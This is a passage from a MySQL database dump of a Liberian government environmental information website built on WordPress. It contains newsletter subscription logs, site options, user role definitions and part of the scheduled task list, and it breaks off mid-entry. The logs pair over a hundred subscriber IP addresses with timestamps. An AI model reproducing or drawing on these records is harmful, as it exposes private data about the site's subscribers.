/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_newsletter_user_logs`
--

LOCK TABLES `wp_newsletter_user_logs` WRITE;
/*!40000 ALTER TABLE `wp_newsletter_user_logs` DISABLE KEYS */;
INSERT INTO `wp_newsletter_user_logs` VALUES (1,2,'41.191.104.90','subscribe','{\"status\":\"C\"}',1575386983),(2,3,'41.191.104.90','subscribe','{\"status\":\"C\"}',1575387682),(3,4,'41.191.107.129','subscribe','{\"status\":\"C\"}',1575403276),(4,5,'41.191.104.108','subscribe','{\"status\":\"C\"}',1575504285),(5,6,'41.191.104.78','subscribe','{\"status\":\"C\"}',1576595655),(6,7,'41.191.105.238','subscribe','{\"status\":\"C\"}',1585746089),(7,7,'41.191.105.238','profile','{\"status\":\"C\"}',1585746184),(8,8,'41.86.19.196','subscribe','{\"status\":\"C\"}',1589551731),(9,9,'41.191.104.41','subscribe','{\"status\":\"C\"}',1597064499),(10,10,'41.191.104.43','subscribe','{\"status\":\"C\"}',1598010772),(11,11,'41.57.95.198','subscribe','{\"status\":\"C\"}',1598541233),(12,12,'41.191.107.216','subscribe','{\"status\":\"C\"}',1600870351),(13,13,'41.191.107.233','subscribe','{\"status\":\"C\"}',1603767842),(14,14,'41.57.95.157','subscribe','{\"status\":\"C\"}',1608731990),(15,15,'158.174.23.43','subscribe','{\"status\":\"C\"}',1610739556),(16,16,'41.86.17.218','subscribe','{\"status\":\"C\"}',1610966790),(17,17,'41.191.104.43','subscribe','{\"status\":\"C\"}',1614613758),(18,18,'164.160.11.10','subscribe','{\"status\":\"C\"}',1614690203),(19,19,'185.239.100.23','subscribe','{\"status\":\"C\"}',1616059600),(20,20,'41.191.104.41','subscribe','{\"status\":\"C\"}',1617199004),(21,21,'160.155.241.72','subscribe','{\"status\":\"C\"}',1618235859),(22,22,'41.191.104.40','subscribe','{\"status\":\"C\"}',1619553486),(23,23,'197.232.61.230','subscribe','{\"status\":\"C\"}',1619733420),(24,24,'41.86.7.38','subscribe','{\"status\":\"C\"}',1622022126),(25,25,'41.191.104.86','subscribe','{\"status\":\"C\"}',1625036237),(26,26,'73.42.213.110','subscribe','{\"status\":\"C\"}',1625037452),(27,27,'41.57.95.37','subscribe','{\"status\":\"C\"}',1626787337),(28,28,'41.191.107.55','subscribe','{\"status\":\"C\"}',1627045616),(29,29,'41.191.104.124','subscribe','{\"status\":\"C\"}',1631100678),(30,30,'41.191.107.207','subscribe','{\"status\":\"C\"}',1631101684),(31,31,'41.191.107.228','subscribe','{\"status\":\"C\"}',1631186762),(32,32,'41.191.104.117','subscribe','{\"status\":\"C\"}',1631186764),(33,33,'41.191.104.41','subscribe','{\"status\":\"C\"}',1631186780),(34,34,'174.255.131.22','subscribe','{\"status\":\"C\"}',1631500386),(35,35,'41.57.95.36','subscribe','{\"status\":\"C\"}',1634680746),(36,36,'41.191.107.145','subscribe','{\"status\":\"C\"}',1634903817),(37,37,'84.71.255.174','subscribe','{\"status\":\"C\"}',1637747661),(38,38,'49.48.141.116','subscribe','{\"status\":\"C\"}',1641188803),(39,38,'70.52.235.88','unsubscribe','{\"status\":\"U\"}',1641218975),(40,39,'41.191.107.199','subscribe','{\"status\":\"C\"}',1647079504),(41,40,'41.191.105.94','subscribe','{\"status\":\"C\"}',1647341947),(42,41,'154.65.24.49','subscribe','{\"status\":\"C\"}',1651065375),(43,42,'41.57.95.254','subscribe','{\"status\":\"C\"}',1652893588),(44,43,'41.191.107.52','subscribe','{\"status\":\"C\"}',1655351044),(45,44,'41.191.105.93','subscribe','{\"status\":\"C\"}',1657211089),(46,45,'41.57.95.249','subscribe','{\"status\":\"C\"}',1659552545),(47,46,'105.71.17.137','subscribe','{\"status\":\"C\"}',1659553162),(48,47,'41.191.104.114','subscribe','{\"status\":\"C\"}',1659621061),(49,48,'41.57.95.164','subscribe','{\"status\":\"C\"}',1659621343),(50,49,'41.57.95.141','subscribe','{\"status\":\"C\"}',1659656076),(51,50,'41.191.104.41','subscribe','{\"status\":\"C\"}',1659920586),(52,51,'41.57.95.195','subscribe','{\"status\":\"C\"}',1663078894),(53,52,'41.57.95.15','subscribe','{\"status\":\"C\"}',1663086486),(54,53,'41.57.95.57','subscribe','{\"status\":\"C\"}',1663119663),(55,54,'216.14.241.82','subscribe','{\"status\":\"C\"}',1666021747),(56,55,'41.191.107.48','subscribe','{\"status\":\"C\"}',1666021761),(57,56,'216.14.241.82','subscribe','{\"status\":\"C\"}',1666021790),(58,57,'41.210.141.16','subscribe','{\"status\":\"C\"}',1666332719),(59,58,'41.57.95.200','subscribe','{\"status\":\"C\"}',1669753565),(60,59,'208.105.189.231','subscribe','{\"status\":\"C\"}',1671979543),(61,60,'41.57.95.191','subscribe','{\"status\":\"C\"}',1673858346),(62,61,'70.177.63.175','subscribe','{\"status\":\"C\"}',1676101917),(63,62,'41.191.104.162','subscribe','{\"status\":\"C\"}',1677295783),(64,63,'41.86.12.2','subscribe','{\"status\":\"C\"}',1683642556),(65,64,'41.191.104.112','subscribe','{\"status\":\"C\"}',1686836430),(66,65,'41.191.104.83','subscribe','{\"status\":\"C\"}',1688574507),(67,66,'41.57.95.207','subscribe','{\"status\":\"C\"}',1708889110),(68,67,'102.214.137.180','subscribe','{\"status\":\"C\"}',1760904416),(69,68,'102.214.137.135','subscribe','{\"status\":\"C\"}',1764614637),(70,69,'143.105.145.77','subscribe','{\"status\":\"C\"}',1764665536),(71,70,'41.191.104.96','subscribe','{\"status\":\"C\"}',1764696390),(72,71,'41.57.95.106','subscribe','{\"status\":\"C\"}',1764700202),(73,72,'41.191.104.66','subscribe','{\"status\":\"C\"}',1767873900),(74,73,'41.57.95.219','subscribe','{\"status\":\"C\"}',1768601817),(75,74,'143.105.145.241','subscribe','{\"status\":\"C\"}',1768991430),(76,75,'41.57.95.224','subscribe','{\"status\":\"C\"}',1768991639),(77,76,'102.214.138.65','subscribe','{\"status\":\"C\"}',1768992154),(78,77,'41.191.104.117','subscribe','{\"status\":\"C\"}',1768993345),(79,78,'41.57.95.116','subscribe','{\"status\":\"C\"}',1768995883),(80,79,'41.191.104.116','subscribe','{\"status\":\"C\"}',1769002548),(81,80,'102.214.138.121','subscribe','{\"status\":\"C\"}',1769002633),(82,81,'102.214.138.121','subscribe','{\"status\":\"C\"}',1769002724),(83,82,'143.105.145.122','subscribe','{\"status\":\"C\"}',1769019939),(84,83,'143.105.145.32','subscribe','{\"status\":\"C\"}',1769027563),(85,84,'102.214.138.100','subscribe','{\"status\":\"C\"}',1769032166),(86,85,'41.191.104.64','subscribe','{\"status\":\"C\"}',1769032732),(87,86,'102.214.137.146','subscribe','{\"status\":\"C\"}',1769044290),(88,87,'41.57.95.156','subscribe','{\"status\":\"C\"}',1769071746),(89,88,'143.105.145.43','subscribe','{\"status\":\"C\"}',1769072992),(90,89,'41.57.95.108','subscribe','{\"status\":\"C\"}',1769082235),(91,90,'41.57.95.93','subscribe','{\"status\":\"C\"}',1769104005),(92,91,'143.105.145.215','subscribe','{\"status\":\"C\"}',1769118804),(93,92,'41.57.95.198','subscribe','{\"status\":\"C\"}',1769171137),(94,93,'154.161.159.118','subscribe','{\"status\":\"C\"}',1769185172),(95,94,'41.191.104.232','subscribe','{\"status\":\"C\"}',1769206117),(96,95,'196.96.112.222','subscribe','{\"status\":\"C\"}',1769559142),(97,96,'102.214.138.75','subscribe','{\"status\":\"C\"}',1769813235),(98,97,'143.105.145.94','subscribe','{\"status\":\"C\"}',1770237631),(99,98,'41.57.95.203','subscribe','{\"status\":\"C\"}',1770673865),(100,99,'41.57.95.203','subscribe','{\"status\":\"C\"}',1770675135),(101,100,'41.191.104.77','subscribe','{\"status\":\"C\"}',1771630104),(102,101,'41.57.95.36','subscribe','{\"status\":\"C\"}',1771847391),(103,102,'41.57.95.185','subscribe','{\"status\":\"C\"}',1771857220),(104,103,'41.57.95.109','subscribe','{\"status\":\"C\"}',1772144994),(105,104,'143.105.145.65','subscribe','{\"status\":\"C\"}',1776073505),(106,105,'102.214.136.51','subscribe','{\"status\":\"C\"}',1776509748),(107,106,'105.155.254.164','subscribe','{\"status\":\"C\"}',1776620203),(108,107,'41.57.95.180','subscribe','{\"status\":\"C\"}',1779420442),(109,108,'143.105.145.23','subscribe','{\"status\":\"C\"}',1781803391);
/*!40000 ALTER TABLE `wp_newsletter_user_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_newsletter_user_meta`
--

DROP TABLE IF EXISTS `wp_newsletter_user_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_newsletter_user_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `meta_key` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_newsletter_user_meta`
--

LOCK TABLES `wp_newsletter_user_meta` WRITE;
/*!40000 ALTER TABLE `wp_newsletter_user_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_newsletter_user_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM AUTO_INCREMENT=5644793 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://ekmsliberia.info','yes'),(2,'home','https://ekmsliberia.info','yes'),(3,'blogname','Official Website of the Environmental Knowledge Management System','yes'),(4,'blogdescription','Republic of Liberia','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','contact@ekmsliberia.info','yes'),(7,'start_of_week','0','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','1','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','1','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','https://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:4:{i:0;s:64:\"/home/ekmslib/public_html/wp-content/themes/kava-child/style.css\";i:1;s:68:\"/home/ekmslib/public_html/wp-content/themes/kava-child/functions.php\";i:3;s:61:\"/home/ekmslib/public_html/wp-content/themes/oceanwp/style.css\";i:4;s:0:\"\";}','no'),(44,'comment_registration','1','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','60717','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:3:{i:1;a:0:{}i:2;a:4:{s:5:\"title\";s:5:\"About\";s:4:\"text\";s:205:\"The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions.\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:8:{s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";s:15:\"hicpo_uninstall\";s:48:\"wp-live-chat-software-for-wordpress/livechat.php\";s:46:\"LiveChat\\LiveChatAdmin::uninstall_hook_handler\";s:28:\"wise-chat/wise-chat-core.php\";a:2:{i:0;s:17:\"WiseChatInstaller\";i:1;s:9:\"uninstall\";}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:35:\"monsterinsights_lite_uninstall_hook\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";s:16:\"cas_fs_uninstall\";s:25:\"bit-social/bit-social.php\";a:2:{i:0;s:42:\"BitApps\\Social\\Providers\\InstallerProvider\";i:1;s:19:\"registerUninstaller\";}s:33:\"bit-social-pro/bit-social-pro.php\";a:2:{i:0;s:45:\"BitApps\\SocialPro\\Providers\\InstallerProvider\";i:1;s:19:\"registerUninstaller\";}}','no'),(82,'timezone_string','','yes'),(84,'page_on_front','9','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','4790','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'wp_page_for_privacy_policy','3','yes'),(92,'show_comments_cookies_opt_in','1','yes'),(93,'initial_db_version','44719','yes'),(94,'wp_user_roles','a:10:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:134:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"rank_math_edit_htaccess\";b:1;s:16:\"rank_math_titles\";b:1;s:17:\"rank_math_general\";b:1;s:17:\"rank_math_sitemap\";b:1;s:21:\"rank_math_404_monitor\";b:1;s:22:\"rank_math_link_builder\";b:1;s:22:\"rank_math_redirections\";b:1;s:22:\"rank_math_role_manager\";b:1;s:24:\"rank_math_search_console\";b:1;s:23:\"rank_math_site_analysis\";b:1;s:25:\"rank_math_onpage_analysis\";b:1;s:24:\"rank_math_onpage_general\";b:1;s:25:\"rank_math_onpage_advanced\";b:1;s:24:\"rank_math_onpage_snippet\";b:1;s:23:\"rank_math_onpage_social\";b:1;s:19:\"rank_math_admin_bar\";b:1;s:10:\"copy_posts\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:29:\"tablepress_import_tables_wptr\";b:1;s:23:\"tablepress_edit_options\";b:1;s:13:\"edit_usp_form\";b:1;s:13:\"read_usp_form\";b:1;s:15:\"delete_usp_form\";b:1;s:14:\"edit_usp_forms\";b:1;s:17:\"publish_usp_forms\";b:1;s:21:\"edit_others_usp_forms\";b:1;s:22:\"read_private_usp_forms\";b:1;s:16:\"delete_usp_forms\";b:1;s:24:\"delete_private_usp_forms\";b:1;s:26:\"delete_published_usp_forms\";b:1;s:23:\"delete_others_usp_forms\";b:1;s:22:\"edit_private_usp_forms\";b:1;s:24:\"edit_published_usp_forms\";b:1;s:13:\"edit_usp_post\";b:1;s:13:\"read_usp_post\";b:1;s:15:\"delete_usp_post\";b:1;s:14:\"edit_usp_posts\";b:1;s:17:\"publish_usp_posts\";b:1;s:21:\"edit_others_usp_posts\";b:1;s:22:\"read_private_usp_posts\";b:1;s:16:\"delete_usp_posts\";b:1;s:24:\"delete_private_usp_posts\";b:1;s:26:\"delete_published_usp_posts\";b:1;s:23:\"delete_others_usp_posts\";b:1;s:22:\"edit_private_usp_posts\";b:1;s:24:\"edit_published_usp_posts\";b:1;s:20:\"manage_everest_forms\";b:1;s:26:\"everest_forms_create_forms\";b:1;s:24:\"everest_forms_view_forms\";b:1;s:31:\"everest_forms_view_others_forms\";b:1;s:24:\"everest_forms_edit_forms\";b:1;s:31:\"everest_forms_edit_others_forms\";b:1;s:26:\"everest_forms_delete_forms\";b:1;s:33:\"everest_forms_delete_others_forms\";b:1;s:26:\"everest_forms_view_entries\";b:1;s:33:\"everest_forms_view_others_entries\";b:1;s:26:\"everest_forms_edit_entries\";b:1;s:33:\"everest_forms_edit_others_entries\";b:1;s:28:\"everest_forms_delete_entries\";b:1;s:35:\"everest_forms_delete_others_entries\";b:1;s:21:\"hicpo_load_script_css\";b:1;s:23:\"hicpo_update_menu_order\";b:1;s:28:\"hicpo_update_menu_order_tags\";b:1;s:29:\"hicpo_update_menu_order_sites\";b:1;s:27:\"hicpo_hicpo_load_script_css\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:53:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:23:\"rank_math_site_analysis\";b:1;s:25:\"rank_math_onpage_analysis\";b:1;s:24:\"rank_math_onpage_general\";b:1;s:24:\"rank_math_onpage_snippet\";b:1;s:23:\"rank_math_onpage_social\";b:1;s:10:\"copy_posts\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:21:\"hicpo_load_script_css\";b:1;s:23:\"hicpo_update_menu_order\";b:1;s:28:\"hicpo_update_menu_order_tags\";b:1;s:27:\"hicpo_hicpo_load_script_css\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:23:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:25:\"rank_math_onpage_analysis\";b:1;s:24:\"rank_math_onpage_general\";b:1;s:24:\"rank_math_onpage_snippet\";b:1;s:23:\"rank_math_onpage_social\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"bbp_keymaster\";a:2:{s:4:\"name\";s:9:\"Keymaster\";s:12:\"capabilities\";a:0:{}}s:13:\"bbp_spectator\";a:2:{s:4:\"name\";s:9:\"Spectator\";s:12:\"capabilities\";a:0:{}}s:11:\"bbp_blocked\";a:2:{s:4:\"name\";s:7:\"Blocked\";s:12:\"capabilities\";a:0:{}}s:13:\"bbp_moderator\";a:2:{s:4:\"name\";s:9:\"Moderator\";s:12:\"capabilities\";a:0:{}}s:15:\"bbp_participant\";a:2:{s:4:\"name\";s:11:\"Participant\";s:12:\"capabilities\";a:0:{}}}','yes'),(95,'fresh_site','0','off'),(96,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'sidebars_widgets','a:33:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:10:\"nav_menu-3\";i:1;s:10:\"nav_menu-2\";}s:7:\"sidebar\";a:1:{i:0;s:6:\"text-2\";}s:12:\"sidebar-shop\";a:0:{}s:15:\"ca-sidebar-2593\";a:1:{i:0;s:13:\"custom_html-3\";}s:15:\"ca-sidebar-2691\";a:1:{i:0;s:14:\"media_image-19\";}s:15:\"ca-sidebar-2445\";a:1:{i:0;s:33:\"core_special_widgets_categories-2\";}s:15:\"ca-sidebar-2224\";a:1:{i:0;s:13:\"media_image-5\";}s:15:\"ca-sidebar-2678\";a:1:{i:0;s:14:\"media_image-17\";}s:15:\"ca-sidebar-2076\";a:1:{i:0;s:13:\"media_image-2\";}s:15:\"ca-sidebar-2088\";a:0:{}s:15:\"ca-sidebar-2174\";a:1:{i:0;s:13:\"media_image-3\";}s:15:\"ca-sidebar-2226\";a:1:{i:0;s:13:\"media_image-6\";}s:15:\"ca-sidebar-2450\";a:1:{i:0;s:33:\"core_special_widgets_categories-3\";}s:15:\"ca-sidebar-2664\";a:1:{i:0;s:13:\"media_image-9\";}s:15:\"ca-sidebar-2673\";a:1:{i:0;s:14:\"media_image-16\";}s:15:\"ca-sidebar-2470\";a:1:{i:0;s:14:\"media_image-12\";}s:15:\"ca-sidebar-2280\";a:1:{i:0;s:14:\"media_image-14\";}s:15:\"ca-sidebar-2709\";a:1:{i:0;s:14:\"media_image-22\";}s:15:\"ca-sidebar-2699\";a:1:{i:0;s:14:\"media_image-21\";}s:15:\"ca-sidebar-2670\";a:1:{i:0;s:14:\"media_image-15\";}s:15:\"ca-sidebar-2278\";a:1:{i:0;s:14:\"media_image-13\";}s:15:\"ca-sidebar-2176\";a:1:{i:0;s:13:\"media_image-4\";}s:15:\"ca-sidebar-4460\";a:0:{}s:15:\"ca-sidebar-2681\";a:1:{i:0;s:14:\"media_image-18\";}s:15:\"ca-sidebar-2228\";a:1:{i:0;s:13:\"media_image-7\";}s:15:\"ca-sidebar-2230\";a:1:{i:0;s:13:\"media_image-8\";}s:15:\"ca-sidebar-2694\";a:1:{i:0;s:14:\"media_image-20\";}s:15:\"ca-sidebar-2817\";a:1:{i:0;s:5:\"wpp-2\";}s:15:\"ca-sidebar-2779\";a:1:{i:0;s:14:\"media_image-23\";}s:15:\"ca-sidebar-2242\";a:1:{i:0;s:11:\"tag_cloud-2\";}s:15:\"ca-sidebar-2091\";a:0:{}s:15:\"ca-sidebar-2467\";a:1:{i:0;s:14:\"media_image-11\";}s:13:\"array_version\";i:3;}','yes'),(102,'cron','a:40:{i:1782111087;a:1:{s:17:\"jetpack_sync_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:21:\"jetpack_sync_interval\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1782111161;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1782111173;a:1:{s:22:\"jetpack_sync_full_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:21:\"jetpack_sync_interval\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1782111203;a:1:{s:10:\"newsletter\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"newsletter\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1782111385;a:1:{s:30:\"everest_forms_cleanup_sessions\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1782111451;a:1:{s:25:\"wpp_maybe_performance_nag\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1782113287;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1782114091;a:1:{s:26:\"fs_data_sync_oceanwp-theme\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"